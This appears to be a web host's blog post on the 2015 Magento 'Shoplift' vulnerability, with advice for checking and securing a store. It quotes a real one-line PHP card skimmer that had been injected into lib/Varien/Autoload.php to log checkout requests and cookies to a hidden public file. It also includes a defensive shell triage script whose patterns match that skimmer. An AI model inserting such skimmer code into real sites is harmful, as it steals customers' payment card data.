Magento security issues (1) – recent vulnerabilities

What’s the problem

If you’ve got a Magento store, then in recent weeks you cannot help but have noticed the numerous reminders about important Magento patches that should be installed to protect the security and integrity of your site.

These stem from a security flaw termed the “Shoplift Bug” discovered in January 2015, the full details of which were revealed in April 2015. Although a patch had been made available by Magento in February to fix the flaw, that patch wasn’t widely taken up – one estimate was that at the time the details of the flaw were revealed, only 50% of all sites had been patched.

We have helped one client (not hosted with us, we hasten to add) who had suffered at the hands of hackers – in their case lib/Varien/Autoload.php had been hacked to include the following:

<?php if(preg_match("/checkout|cart/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>

The result of the hack was that the contents of all requests to URLs which included the words “checkout” or “cart” in them were encoded and left in a file hidden deep within the media folder – that file was publicly accessible and could be picked up and decoded by the hackers at their leisure. Whilst the payment processing was handled by their payment gateway, the card details, expiry dates, CVV numbers and address details were handled on the client’s checkout, so all that information was contained within the encoded file.

The hack also added a number of “semi-official” looking user accounts, using names like System Backup and email address @magento.com, as well as leaving a backdoor in the skin/ folder for future usage.

With those details compromised, the only line of defence against card fraud then becomes the 3D Secure code, if enabled on the account, and if enabled on any website on which the fraudsters attempt to use the card. Either way, by having card details exposed in such a way, you leave yourself vulnerable to very large fines from the PCI DSS side of things.

What you should be doing about it

There are a number of things that you can do right now to check if your site is at risk:

  • Use this free website to check if your site is at risk of the Shoplift bug
  • Check the admin accounts on your site (from the admin panel go to System / Permissions / Users) – disable and delete any that you don’t recognise straight away, and disable any others. The worst that’s going to happen is you annoy someone who you’d forgotten had access to your site, but if you don’t recognise them in the list, it’s more likely that they’ve not worked on the site in a while anyway!
  • If you have FTP access to your site (and hopefully you’ve got SFTP access, if any access, to your site) then look in the skin/ folder and see if there are any files in there – folders named “adminhtml”, “frontend” and “install” are fine, it’s files you’re worried about.
  • Also if you have SFTP or FTP access to your site, look in the lib/Varien folder and download the Autoload.php file – open it up in a text editor on your computer (it’s perfectly safe to do so) and look at the first line – be sure to scroll to the right, if you can – and see if it looks like the suspicious line above.
  • Make sure, by asking your hosts, your developers, or us, that the security patches have been installed.
  • Make sure, by looking at the bottom of any page in your admin panel, that you’re up to date in Magento versions (you should be on version 1.9.1.1). If you’re on 1.8, we’ll probably forgive you, but if you’re on 1.7 or below, it’s time to start thinking about updating to the latest version – get in touch if you’re not sure how to go about that.
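The three file-system checks in the list above (files in skin/, the first line of lib/Varien/Autoload.php, and stray non-image files under media/catalog/product) can be run in one go from a shell on the server. This is an added, read-only triage script, not part of the original post or of Magento itself; it assumes the standard Magento 1.x directory layout and only reads files, never changing them.

```shell
#!/bin/sh
# Added example: read-only triage of a Magento 1.x document root.
# Usage:  magento_triage /path/to/magento/root
# Exit status: 0 = nothing suspicious found, 1 = one or more FINDING lines printed.
magento_triage() {
    root="$1"
    findings=0

    # 1. skin/ should hold only the adminhtml/frontend/install folders;
    #    any regular file sitting directly in it is a backdoor candidate.
    if [ -d "$root/skin" ]; then
        hits=$(find "$root/skin" -maxdepth 1 -type f)
        if [ -n "$hits" ]; then
            echo "FINDING: unexpected file(s) in skin/:"; echo "$hits"
            findings=1
        fi
    fi

    # 2. Autoload.php normally starts with a bare PHP open tag. A first line that
    #    matches checkout/cart URIs, serializes $_REQUEST or $_COOKIE, base64-encodes
    #    data or writes it to disk is the shape of the skimmer quoted above.
    autoload="$root/lib/Varien/Autoload.php"
    if [ -f "$autoload" ]; then
        first=$(head -n 1 "$autoload")
        if printf '%s' "$first" | grep -Eq 'file_put_contents|base64_encode|\$_REQUEST|\$_COOKIE|preg_match\(.*(checkout|cart)'; then
            echo "FINDING: suspicious first line in lib/Varien/Autoload.php"
            findings=1
        fi
    fi

    # 3. Harvest files are dropped where they are web-readable; anything under
    #    media/catalog/product that is not an image (or .htaccess) deserves a look.
    if [ -d "$root/media/catalog/product" ]; then
        hits=$(find "$root/media/catalog/product" -type f \
                   ! -iname '*.jpg' ! -iname '*.jpeg' ! -iname '*.png' \
                   ! -iname '*.gif' ! -name '.htaccess')
        if [ -n "$hits" ]; then
            echo "FINDING: non-image file(s) under media/catalog/product:"; echo "$hits"
            findings=1
        fi
    fi

    return $findings
}
```

Run it against a copy of the site as well as the live root: a clean copy from your own backups should come back silent, which tells you the script is not simply noisy on your layout.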

What your hosts should be doing about it

All too many hosts, these days, won’t proactively do anything to help you unless you’re on a (generally expensive) support contract. We don’t think hosting should be like that – we install all important security patches for all our hosting clients for free, as soon as they come out, without being asked, so you can get on with what you do. If that approach sounds like the sort of thing you’re after, then feel free to get in touch.

Amongst other things, your hosts should be ensuring that the hosting platform they provide is as secure as possible. Your site’s files’ permissions should be set at the most secure level which still allows the site to function, and nothing less. Access to the site should be by SFTP, not FTP, and ideally should be restricted only to those users who need it, authenticated via public key encryption, not passwords. Regular scans for viruses and other malware, a solid firewall combined with a scanning service which proactively blocks any IP addresses which act suspiciously, tight security procedures, and server monitoring of all relevant indicators should be in place. Since an improperly set up shared hosting arrangement means that a vulnerability on one site is a vulnerability in all sites, if your hosts can’t provide satisfactory answers to questions about their security arrangements, it may be time to get yourself a new host.

Got any concerns?

If, after reading the above, you’ve got any concerns whatsoever, then get in touch – we’ll happily take a look for you, and give you impartial, expert advice on whether you have got security problems and what to do about them if you do.

Keep your eyes peeled for the next posts in this series, which will look at some simple steps you can implement which will secure your Magento site considerably, and then look at best practices in Magento security.
